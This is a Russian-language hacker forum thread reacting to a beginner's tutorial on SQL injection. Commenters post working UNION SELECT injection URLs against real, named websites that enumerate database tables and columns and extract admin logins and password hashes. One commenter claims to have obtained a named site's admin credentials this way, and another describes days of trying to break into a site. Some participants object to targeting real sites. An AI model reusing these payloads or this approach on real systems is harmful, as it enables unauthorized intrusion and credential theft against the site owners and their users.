![]() |
Спасибо.
|
Цитата:
Цитата:
P.S. намек: зачем хексить хекс... может лучше UNHEX(0x5573657273), а если по правде, то я вам не скажу за всю SQL, вся SQL слишком велика, но MySQL 3 по 5 обожают чистый хекс т.е. 0x5573657273, но в данном случае это не прокатит, по краней мере на моей памяти хекс работал только в where и в функциях |
Цитата:
Ну методом научного тыка пытался что то сделать )). Просто не могу понять как вывести значение столбца. Код:
http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,15,16,17,18,19,20,21,22,23,24+from+INFORMATION_SCHEMA.columns+where+table_name=unhex(7573657273)+--+Код:
http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,passwd,15,16,17,18,19,20,21,22,23,24+from+unhex(7573657273)+--+ |
J0cker при выборке данных из конкретной таблицы, нельзя писать имя таблици в ascii или hex
select column from 'имя_таблици_в_плавном_виде' |
Цитата:
Код:
http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,concat%28@i:=0x00,@o:=0x0d0a,benchmark%28400,@o:=CONCAT%28@o,0x0d0a,%28SELECT+concat%28table_schema,0x2E,@i:=table_name%29+from+information_schema.tables+WHERE+table_name%3E@i+order+by+table_name+LIMIT%201%29%29%29,@o%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+Выведем колонки city_351.admin: Код:
http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,group_concat%28column_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646d696e+--+Вот и всё, таким образом Вы можете выводить колонки таблиц. |
Xоть я в этом деле не шарю, единственная статья в которой все понятно прочитал их около 10, но везде урезками, или фразами не понятные новечкам. Автору распект!!!
|
спасибо
|
Спасибо за статью,новачкам будет полезно...
|
И не только...
Цитата:
|
По-моему, бред подставлять в статье реальный адрес сайта. Это же надо было додуматься до такого...
Читайте лучше полный FAQ по SQL-inj. |
Цитата:
Цитата:
|
Зачем Вы пишет этот гуан?
Есть уже куча подобных материалов на эту тему, которые тоже гуан. На _данном_форуме_, пожалуй, самый лучший материал был у нуля, к тому же в его теме было очень много дополнений. Статьи нужно писать для того, чтобы донести до пользователя что то новое и интересное(ну или хотя бы просто интересное), а не для того, чтобы показать всем уровень своих знаний(который, судя по статье, ничтожен). Подумайте над этим. |
Ничего нового, уже много статей есть на эту тему, где всё хорошо разжевано.
|
Цитата:
Я хоть где нибудь говорил, что в моей статье есть что-то новое, оригинальное? Я просто описал основы понятным языком, на что и сделан упор. |
Цитата:
|
-PRIVAT- покажи мне, где я хоть раз утверждал, что отличный хекер и знаю об инъекциях чуть менее, чем все.
Асю не дам :Р |
нормальная статья
|
еврейский шедевр!
я по этой статье научился всему.. теперь me ломаю телекоммуникационные сети и соц сети.. |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Цитата:
|
Цитата:
Ноль расписал некоторые отросли этой "атаки" так сказать, "изнутри"(громко сказано, конечно, но примерно так). Вы же научили пользователя подставлять кавычки и все такое даже не объяснив как это происходит. В Вашей статье нет ничего того, чего нету в остальных говно-статьях о скуль-инжектах. Так же, что о мне подсказывает, что Вы просто переписали своими словами статью нуля и сделали это не лучшим образом. И не пытайтесь мне что то доказать, у Вас все равно не получится. |
Хотел бы отметить, что для начала надо читать не статьи об инжектах, а книжки по скуле, чтоб хоть уметь работать с базой для начала. А на счет статьи, соглашусь с Еррорнео, это не стаья в которой рассказывается теория, а простенький пример использования, способный пробудить интерес. Но указание ссылки на сайт считаю не правильным. Для этих целей можно было зарегить домен и повесить на него сайт, на котором и показывать пример.
|
Цитата:
Цитата:
Ins3t, PvgValo +1 |
Цитата:
И не стоит винить других в этом. Чтобы практиковаться можно и apache/mysql поднять у себя. |
Цитата:
Цитата:
Цитата:
Цитата:
|
Статья гавно, для детей даунов, нолик и так описал как надо, с самого нуля, что да как, да нет же, надо ещё создать статью мол я такой же опупенный хакир как нолик!
|
|
Народ
я ввел из урока последнюю строку http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(login ,0x3a,passw),20,21,22+from+AdminSite+--+ но не увидел ни логина ни пароля |
а вообще статья хорошая для нубов как я
Я пошол в топик ачата где просто дают ссылки на сайты с SQL инъкциями и почитав эту статью нашол пароль и логин от админки сайта http://www.dovidkalutsk.com.ua/ |
Цитата:
|
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Вообщем статью стоило назвать "Что надо делать когда у вас есть стандартная скуля на 5 ветке mysql" - и то,целью стояло (ну я так понял) построить грамотную и понятную обсолютно любому статью,тут же ты просто введешь людей в заблуждение. А еще,вот допустим новичок нарвался на mssql или oracle чтоже он будет делать?Или фильруется что-то,где обходы,ах боюсь предположить,что ты сам нехера не в теме. Всем новичкам,кто очень хочет научиться и вникнуть в тему советую сделать следующее: 1.)Ни в коем случае не читать етот бред (это лишь совет,выбирать вам) 2.)Идти читать документации (ну или хотябы книжку какую-нибудь,где самые основы и нетолько) 3.)Идти читать статью от нуля (она неподалеку и прикреплена,если будет непонятно,то значит плохо прочитали документацию,либо не судьба) 4.)Ну и конечно же практиковаться,сначала на локалке,скачать денвер (ненадо изобретать велосипед) и поставить уязвимый скрипт,смотреть что да как. Ну или прочитать енто и идти хекать тырнеты,незная что такое update\drop и так далее=\ P.S. Автор,не обижайся на меня,я лишь высказал свое мнение,надеюсь,что ты когда-нибудь скажешь сам c улыбкой "О боже,как я мог такое написать " |
А у меня все получается до того когда тейблы выводятся и все. Конвертировал все в аси а при запросе выводит раз двадцать название тейбла.(user,user,user,user)
|
ТС, а чем тебя /thread43966.html не устраивает?
ЗЫ Вот она для новичков, а ты для скрипт кидисов написал |
Цитата:
|
Цитата:
|
Хм, действительно пофиксили.
|
Блин...думал тут решится мой вопрос))
ребят вы чего друг у друга копипастите?)) это обычный копипаст просто своими словами..... вот я не могу сделать все по инструкции... т .к у меня вылазит вот такая ошибочка,даже не ошибочка а просто вылазит вот такая штука : 1)Вот ссылка до изменения http://site.ru/index.php?f=stat&sid=2 2)вот ссылка в именении http://site.ru/index.php?f=stat&sid=2FROM news WHERE id='774' 3)Вот ссылка после изменения : http://site.ru/index.php?f=stat&sid=2FROM%20news%20WHERE%20id='77 4' __________________________________________________ ___ Вот и обьсни мне пожалуйста,откуда тут взялись %20 ?? я уже 5-тые сутки не могу взломать этот сайт ;D |
| Время: 21:57 |